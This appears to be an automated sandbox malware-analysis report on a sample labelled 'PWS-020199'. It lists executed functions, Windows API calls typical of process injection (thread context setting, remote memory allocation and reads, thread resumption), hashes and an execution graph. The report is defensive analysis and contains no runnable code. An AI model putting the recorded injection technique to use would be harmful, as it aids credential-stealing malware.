                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 86c4a76729b4f6829d9717dcc8bbe4efd24e5d537252be7f0712a1e92b174acf
                            • Instruction ID: f91e468f86fa329ad98afe45c48994b79ee4f0264cfce0ca9a36cb14c096ae64
                            • Opcode Fuzzy Hash: 86c4a76729b4f6829d9717dcc8bbe4efd24e5d537252be7f0712a1e92b174acf
                            • Instruction Fuzzy Hash: 0C21E3B5900248EFDB10CF9AD984AEEBBF9EB48320F14841AE914A7350D375A954CFA5
                            Function 03371A99 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 808 3371a99-3371aeb 810 3371aed-3371af9 808->810 811 3371afb-3371b2b Wow64SetThreadContext 808->811 810->811 813 3371b34-3371b64 811->813 814 3371b2d-3371b33 811->814 814->813
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 03371B1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 77769203893ba9532bea95c36d4ae9bd77d37beb1c723fa63d3e997f0de96c65
                            • Instruction ID: f32dabbedecb8baf44aac637995d2d2679f01270bebdc7c94e78aeabe5ebf558
                            • Opcode Fuzzy Hash: 77769203893ba9532bea95c36d4ae9bd77d37beb1c723fa63d3e997f0de96c65
                            • Instruction Fuzzy Hash: F1213872D002498FDB10DFAAC885BEEFBF5EF48324F148429D459A7241DB789945CFA0
                            Function 03371AA0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                            Download Yara Rule
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 03371B1E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 12aeeb9b771abcec3e53be620a1d8de134bcc38cc08eecb4c6a223e5b11c70b1
                            • Instruction ID: 6c10bbf3c4581bbde44279f92a3abf37be1c2f33ec06f1bbe6d6829bf7af3667
                            • Opcode Fuzzy Hash: 12aeeb9b771abcec3e53be620a1d8de134bcc38cc08eecb4c6a223e5b11c70b1
                            • Instruction Fuzzy Hash: FC211571D002498FDB10DFAAC885BEEFBF5EF88324F14842AD459A7240DB789945CFA5
                            Function 03371D28 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 03371DA8
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: cd4ed36bf06b1814ef0108d85f0910ee7b1580966a1d5a475791b44bcfa278ff
                            • Instruction ID: f50af1990228fb8c22d48023e9ddde4ae48fe961ba4d597ec34e61d7a0ef76e8
                            • Opcode Fuzzy Hash: cd4ed36bf06b1814ef0108d85f0910ee7b1580966a1d5a475791b44bcfa278ff
                            • Instruction Fuzzy Hash: DC213971D002499FDB10DFAAC880AEEFBF5FF48320F148429E519A7240C7799900CFA0
                            Function 01A1D759 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                            Download Yara Rule
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,01A1D726,?,?,?,?,?), ref: 01A1D7E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID:
                            • API String ID: 3793708945-0
                            • Opcode ID: 9099bb773019f1d3bed98519ecf9471611804259d03afa583a2100e4ad82aa24
                            • Instruction ID: cda0184cf64c66a33f7ace9258cd5eb534872de85f9c889bc0a41b53090539a4
                            • Opcode Fuzzy Hash: 9099bb773019f1d3bed98519ecf9471611804259d03afa583a2100e4ad82aa24
                            • Instruction Fuzzy Hash: AF21E2B5D00249DFDB10CFAAD584AEEBBF5FB48320F14841AE918A7350C378A944CF60
                            Function 03371B71 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03371BE6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 7fb867f91c19690563cff4b2f5a4584ecd6b09942ead78ff6e54b75d82653694
                            • Instruction ID: a01bf36d7dc0aefdc16ce05881389a530785dae9ad94b992afd21b4c21fba3a6
                            • Opcode Fuzzy Hash: 7fb867f91c19690563cff4b2f5a4584ecd6b09942ead78ff6e54b75d82653694
                            • Instruction Fuzzy Hash: AC1147769002499FDB20DFAAC845ADEBFF5EF48320F148819E515A7250CB799540CBA1
                            Function 01A1A248 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A1B159,00000800,00000000,00000000), ref: 01A1B36A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 5b847f2a02514f5d3a6fafdd7c5dd5aabf132ace02708f88c7f14b35ab98055c
                            • Instruction ID: 9c9508e6f31ffc462b2b1b2091253924dfb7b254c7ad9b3cc6d486d974563b3a
                            • Opcode Fuzzy Hash: 5b847f2a02514f5d3a6fafdd7c5dd5aabf132ace02708f88c7f14b35ab98055c
                            • Instruction Fuzzy Hash: 851112B6D002488FDB10CF9AC844ADEFBF4EF88320F14842AE919A7600C375A945CFA5
                            Function 03371B78 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                            Download Yara Rule
                            APIs
                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 03371BE6
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 303f39c528bec7160f972ebe64fb1bdaa7bb67242d91a18c0864d49285d90b51
                            • Instruction ID: 389e5dd833f2c5f0cca45982291e50ae1fa0708b1886e68b3009991cab0db8a3
                            • Opcode Fuzzy Hash: 303f39c528bec7160f972ebe64fb1bdaa7bb67242d91a18c0864d49285d90b51
                            • Instruction Fuzzy Hash: 51113A759002499FDB20DFAAC845ADFFFF5EF48320F148819E515A7250CB759544CFA0
                            Function 033715B1 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: 4ca0082b255cd6cb3e6218ea2e899f95e8c41acd9c7cae4408f8c0d8a43ebd97
                            • Instruction ID: 3eb8f24fad4f03c1a08fd05f75df0026d5dc2ff7619f6e00680d3bb61696f7f0
                            • Opcode Fuzzy Hash: 4ca0082b255cd6cb3e6218ea2e899f95e8c41acd9c7cae4408f8c0d8a43ebd97
                            • Instruction Fuzzy Hash: AB115B75D002488FDB20DFAAC4457EFFBF9EF88320F148419D419A7240CB79A544CBA5
                            Function 01A1B2F9 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01A1B159,00000800,00000000,00000000), ref: 01A1B36A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 2063d34902fb764605118d718ef93ff594d6d2f0a9a7d451b04c4d801af0a968
                            • Instruction ID: eb9f8de9a160f84665d5740a14a7081581af7c0ad5e767c054fe8c16b4f15c17
                            • Opcode Fuzzy Hash: 2063d34902fb764605118d718ef93ff594d6d2f0a9a7d451b04c4d801af0a968
                            • Instruction Fuzzy Hash: DD11F3B6D002498FDB10CF9AC444ADEFBF5FF48320F14852AD959A7600C379A545CFA5
                            Function 033715B8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: ResumeThread
                            • String ID:
                            • API String ID: 947044025-0
                            • Opcode ID: d66c5372eff0840f73b6fd7775b187872948145932be841e257421a40baa78c8
                            • Instruction ID: 6b79b81ea2c75045d69a921d03a5345b67796f35ca2f5bf833816a2299b76e87
                            • Opcode Fuzzy Hash: d66c5372eff0840f73b6fd7775b187872948145932be841e257421a40baa78c8
                            • Instruction Fuzzy Hash: 3E113AB1D002488FDB20DFAAC44579EFBF9EF88324F148819D419A7240CB79A944CB94
                            Function 03373E70 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 03374555
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: afd51c803629a527dde995d5f42351c3ca06f1891feb12685ab79f54857e0e87
                            • Instruction ID: d5fb5138679865dff973c0a508ea41fb555cfdd83976dff8ac5769888cb30faa
                            • Opcode Fuzzy Hash: afd51c803629a527dde995d5f42351c3ca06f1891feb12685ab79f54857e0e87
                            • Instruction Fuzzy Hash: DC110AB5800349DFDB20DF9AC484BDEFBF8EB48320F148459D518A7200C375A944CFA1
                            Function 033744F0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                            Download Yara Rule
                            APIs
                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 03374555
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: MessagePost
                            • String ID:
                            • API String ID: 410705778-0
                            • Opcode ID: 3bf38de8e085c53686eb665e53ea629bcf45109efe5ed05872c0df83481093b1
                            • Instruction ID: 21c8c8a2d10435bb9ac15cca5d5fde6fb51b1341e8f162e73bcfc13e3c9e0b69
                            • Opcode Fuzzy Hash: 3bf38de8e085c53686eb665e53ea629bcf45109efe5ed05872c0df83481093b1
                            • Instruction Fuzzy Hash: C01106B5800248DFDB20CF9AD885BDEFBF8FB48320F148819D518A7600C379A544CFA1
                            Function 01A1B078 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNELBASE(00000000), ref: 01A1B0DE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID: HandleModule
                            • String ID:
                            • API String ID: 4139908857-0
                            • Opcode ID: b63dd57d96a4e351206d62606118953254053f6394e732730bf28db78cfe796b
                            • Instruction ID: 43677151d550705dc37fa6daa72cd6e5de1e7d832414464bee9b90fbefa1d426
                            • Opcode Fuzzy Hash: b63dd57d96a4e351206d62606118953254053f6394e732730bf28db78cfe796b
                            • Instruction Fuzzy Hash: 3E1110B5C002498FDB20CF9AC444BDEFBF4EF88320F14841AD928A7200D379A545CFA1
                            Function 0167D4C4 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5907ea829aad234bd35ee51e8422ddd69387eaceaa8e8512fb9c902bac577384
                            • Instruction ID: 846e019d689c09925fb577b73153a010c0d4a2f10a7a25bed21a6224f1a6b5ee
                            • Opcode Fuzzy Hash: 5907ea829aad234bd35ee51e8422ddd69387eaceaa8e8512fb9c902bac577384
                            • Instruction Fuzzy Hash: 8E21F5B1504240DFEB15DF58DDC0B26BFA5FF88718F24CA69E9090B256C336D456CBA1
                            Function 0167D3D8 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 93b2c69a34d849c785110cabd409346b69e795f7a5ac97310cfec6f358a91a4f
                            • Instruction ID: a88fa86868a14e057efee80ff4ce87c65a79a6dbc7981bc74e093235664c18fd
                            • Opcode Fuzzy Hash: 93b2c69a34d849c785110cabd409346b69e795f7a5ac97310cfec6f358a91a4f
                            • Instruction Fuzzy Hash: B42136B2500200DFDB01DF48C9C0B56BF65FF98324F24C968E9094B24AC336E406CAA1
                            Function 0168D01C Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63d3d4f2b760a85d53b1a38ecc0f7a5f256c442ef2538652ee17ff10d4379bcc
                            • Instruction ID: e10dbef2127259a49e4403d6231a2916b5505eeaf966454468517f064217e537
                            • Opcode Fuzzy Hash: 63d3d4f2b760a85d53b1a38ecc0f7a5f256c442ef2538652ee17ff10d4379bcc
                            • Instruction Fuzzy Hash: D9212271604200DFDB15EF98D880B26BBA5FB88314F24CA6DE90A4B386C33AD407CA71
                            Function 0168D1D4 Relevance: .1, Instructions: 72COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 407bb5a7acac5da1edb6115e1e47bb105f0e6f9e46fe7665911812bb6c02fe1d
                            • Instruction ID: fdfbcbbb60e8bf6012f4420be8edf8db38d7303aed6581262f02db971223afab
                            • Opcode Fuzzy Hash: 407bb5a7acac5da1edb6115e1e47bb105f0e6f9e46fe7665911812bb6c02fe1d
                            • Instruction Fuzzy Hash: A821F571504204EFDB05EF98D9D0B26BBA5FB88324F24C66DEA494B396C336D406CA71
                            Function 0168D006 Relevance: .1, Instructions: 60COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c4082cedcc09d4f59000b94495f96b5c4d806f2a1250a848504d7460327abc09
                            • Instruction ID: ff2c92618ea8ec6a5eaa6375888f007572bb9c740604b33ae1e96c5e3c8dda79
                            • Opcode Fuzzy Hash: c4082cedcc09d4f59000b94495f96b5c4d806f2a1250a848504d7460327abc09
                            • Instruction Fuzzy Hash: 1621A175509380CFDB13DF64D990B15BF71EB45214F28C6DAD8498B2A7C33A940BCB62
                            Function 0167D4BF Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction ID: dfb92cd267120060bb7f4a6b1d199495142bc60059c9f1de50c141b321dfa9f6
                            • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction Fuzzy Hash: C211E172404280CFDB12CF54D9C0B16BF71FF84324F24C6A9D9490B256C33AD45ACBA1
                            Function 0167D3D3 Relevance: .1, Instructions: 56COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction ID: fad51b958d032f61a62bc36494229949ccbfed8cf6aed11f0f2a941acde9633d
                            • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                            • Instruction Fuzzy Hash: 6211DC72404280DFDB12CF44D9C0B56BF72FB84324F24C6A9D9090B25AC33AE45ACBA2
                            Function 0168D1CF Relevance: .1, Instructions: 53COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680860020.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_168d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                            • Instruction ID: def710f67b7596293dc61f112e5b5ecdf759079c130b09ae352a7e6edc573d7b
                            • Opcode Fuzzy Hash: 8bad08bc3297c4791243414a9a82218353e3075920b51f23bb46501d1989d77c
                            • Instruction Fuzzy Hash: 7411BB75544280DFDB12DF58C9D0B15BBB1FB84324F24C6A9D9494B396C33AD40ACB61
                            Function 0167D759 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c27e56255e5e7f7bbbf58936ff6e44b59c817395391ccc57db96694f4f790660
                            • Instruction ID: 5a0523fe7875645370851ff8220294cf4ab685f6f4d72added221fe5407ef84d
                            • Opcode Fuzzy Hash: c27e56255e5e7f7bbbf58936ff6e44b59c817395391ccc57db96694f4f790660
                            • Instruction Fuzzy Hash: C801A7711043849AE7219A9ACC84B76FFA8EF45720F188D1AED094E386D3799841C671
                            Function 0167D758 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1680822429.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_167d000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d166d39be1ed9aab3da4f1a5058f3b074fc9e6101c4728ea6f9613c349d0d8bd
                            • Instruction ID: c89c38b81b1b6ed30ba0985afc25874ab344777cfd612517f8c607d854977da2
                            • Opcode Fuzzy Hash: d166d39be1ed9aab3da4f1a5058f3b074fc9e6101c4728ea6f9613c349d0d8bd
                            • Instruction Fuzzy Hash: 7BF06272404384AEE7218A5ADC84B62FFA8EF55734F18C95AED484F387C3799844CAB1

                            Non-executed Functions

                            Function 03371668 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4a422cde55756b8f07eefd8fd7fc01f986a30a46957868ce6df9de689f36624a
                            • Instruction ID: b759e676598b0f555b46453d0862b1f8146283a0dc8bd5a1926f19913e28aa9f
                            • Opcode Fuzzy Hash: 4a422cde55756b8f07eefd8fd7fc01f986a30a46957868ce6df9de689f36624a
                            • Instruction Fuzzy Hash: DEE1F775E002598FDB14DFA9C5809AEFBB2FF89304F248169D415AB356D734A942CFA0
                            Function 03370D90 Relevance: .3, Instructions: 312COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f431fe3e90e7e185500c2ae31307bc0afdf12d253264aa53461d52a2a486cfc9
                            • Instruction ID: 4d50d2004bbfe5bad2ff71aa0fe77dff3249a69afc6875db90228bdf90e42432
                            • Opcode Fuzzy Hash: f431fe3e90e7e185500c2ae31307bc0afdf12d253264aa53461d52a2a486cfc9
                            • Instruction Fuzzy Hash: ACE10974E102598FDB14DFA9C9809AEFBB2FF89304F248169D414AB356D734AD42CFA0
                            Function 01A1D444 Relevance: .3, Instructions: 264COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681247378.0000000001A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01A10000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1a10000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b45961e57fda794295a7cb7095a3e6aca8f0330e3c02a6c841b6c161406b08ec
                            • Instruction ID: ad7ae215a337fef8ed169ce7bd8dda473656ea43f08bc1b943536b4d7490e1e8
                            • Opcode Fuzzy Hash: b45961e57fda794295a7cb7095a3e6aca8f0330e3c02a6c841b6c161406b08ec
                            • Instruction Fuzzy Hash: 5CA16D32E0025A8FCF05DFB4C9445DEBBB2FF85300B15856AE905AB269DB71E95ACB40
                            Function 03371658 Relevance: .1, Instructions: 134COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1681413283.0000000003370000.00000040.00000800.00020000.00000000.sdmp, Offset: 03370000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_3370000_indent PWS-020199.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 527bacf7cb5a371e184b32e20ecbe8672ad5b87a0c4569e7440c10482a794ae9
                            • Instruction ID: 291da139c0bf4b81a3a9b877b7bdfbea2934bc2bf16a7e708e90dda3ea9ac264
                            • Opcode Fuzzy Hash: 527bacf7cb5a371e184b32e20ecbe8672ad5b87a0c4569e7440c10482a794ae9
                            • Instruction Fuzzy Hash: 92511875E042598FDB14CFA9C9809AEFBF6FF89304F248169D418A7316D734A942CFA1

                            Execution Graph

                            Execution Coverage:1.2%
                            Dynamic/Decrypted Code Coverage:4.7%
                            Signature Coverage:8.8%
                            Total number of Nodes:148
                            Total number of Limit Nodes:12
                            execution_graph 93097 42aa03 93098 42aa20 93097->93098 93101 14f2df0 LdrInitializeThunk 93098->93101 93099 42aa48 93101->93099 93102 4241a3 93103 4241bf 93102->93103 93104 4241e7 93103->93104 93105 4241fb 93103->93105 93106 42b3b3 NtClose 93104->93106 93112 42b3b3 93105->93112 93108 4241f0 93106->93108 93109 424204 93115 42d3b3 RtlAllocateHeap 93109->93115 93111 42420f 93113 42b3d0 93112->93113 93114 42b3e1 NtClose 93113->93114 93114->93109 93115->93111 93270 42e373 93271 42e383 93270->93271 93272 42e389 93270->93272 93273 42d373 RtlAllocateHeap 93272->93273 93274 42e3af 93273->93274 93275 424533 93278 424542 93275->93278 93276 424589 93277 42d293 RtlFreeHeap 93276->93277 93279 424599 93277->93279 93278->93276 93280 4245ca 93278->93280 93282 4245cf 93278->93282 93281 42d293 RtlFreeHeap 93280->93281 93281->93282 93116 41df43 93117 41df69 93116->93117 93121 41e057 93117->93121 93122 42e4a3 93117->93122 93119 41dffb 93119->93121 93128 42aa53 93119->93128 93123 42e413 93122->93123 93126 42e470 93123->93126 93132 42d373 93123->93132 93125 42e44d 93135 42d293 93125->93135 93126->93119 93129 42aa6d 93128->93129 93144 14f2c0a 93129->93144 93130 42aa99 93130->93121 93138 42b6c3 93132->93138 93134 42d38e 93134->93125 93141 42b713 93135->93141 93137 42d2ac 93137->93126 93139 42b6e0 93138->93139 93140 42b6f1 RtlAllocateHeap 93139->93140 93140->93134 93142 42b72d 93141->93142 93143 42b73e RtlFreeHeap 93142->93143 93143->93137 93145 14f2c1f LdrInitializeThunk 93144->93145 93146 14f2c11 93144->93146 93145->93130 93146->93130 93147 401a02 93148 401a36 93147->93148 93151 42e833 93148->93151 93154 42ce93 93151->93154 93155 42ceb6 93154->93155 93166 407353 93155->93166 93157 42cecc 93165 401ad7 93157->93165 93169 41ac33 93157->93169 93159 42ceeb 93160 42cf00 93159->93160 93184 42b763 93159->93184 93180 427483 93160->93180 93163 42cf0f 93164 42b763 ExitProcess 93163->93164 93164->93165 93187 4164d3 93166->93187 93168 407360 93168->93157 93170 41ac5f 93169->93170 93198 41ab23 93170->93198 93173 41ac8c 93174 42b3b3 NtClose 93173->93174 93177 41ac97 93173->93177 93174->93177 93175 41acc0 93175->93159 93176 41aca4 93176->93175 93178 42b3b3 NtClose 93176->93178 93177->93159 93179 41acb6 93178->93179 93179->93159 93181 4274dd 93180->93181 93183 4274ea 93181->93183 93209 4182f3 93181->93209 93183->93163 93185 42b77d 93184->93185 93186 42b78e ExitProcess 93185->93186 93186->93160 93188 4164ea 93187->93188 93190 416503 93188->93190 93191 42bdf3 93188->93191 93190->93168 93193 42be0b 93191->93193 93192 42be2f 93192->93190 93193->93192 93194 42aa53 LdrInitializeThunk 93193->93194 93195 42be84 93194->93195 93196 42d293 RtlFreeHeap 93195->93196 93197 42be9d 93196->93197 93197->93190 93199 41ac19 93198->93199 93200 41ab3d 93198->93200 93199->93173 93199->93176 93204 42aaf3 93200->93204 93203 42b3b3 NtClose 93203->93199 93205 42ab0d 93204->93205 93208 14f35c0 LdrInitializeThunk 93205->93208 93206 41ac0d 93206->93203 93208->93206 93210 41831d 93209->93210 93216 41878b 93210->93216 93217 413ef3 93210->93217 93212 41842a 93213 42d293 RtlFreeHeap 93212->93213 93212->93216 93214 418442 93213->93214 93215 42b763 ExitProcess 93214->93215 93214->93216 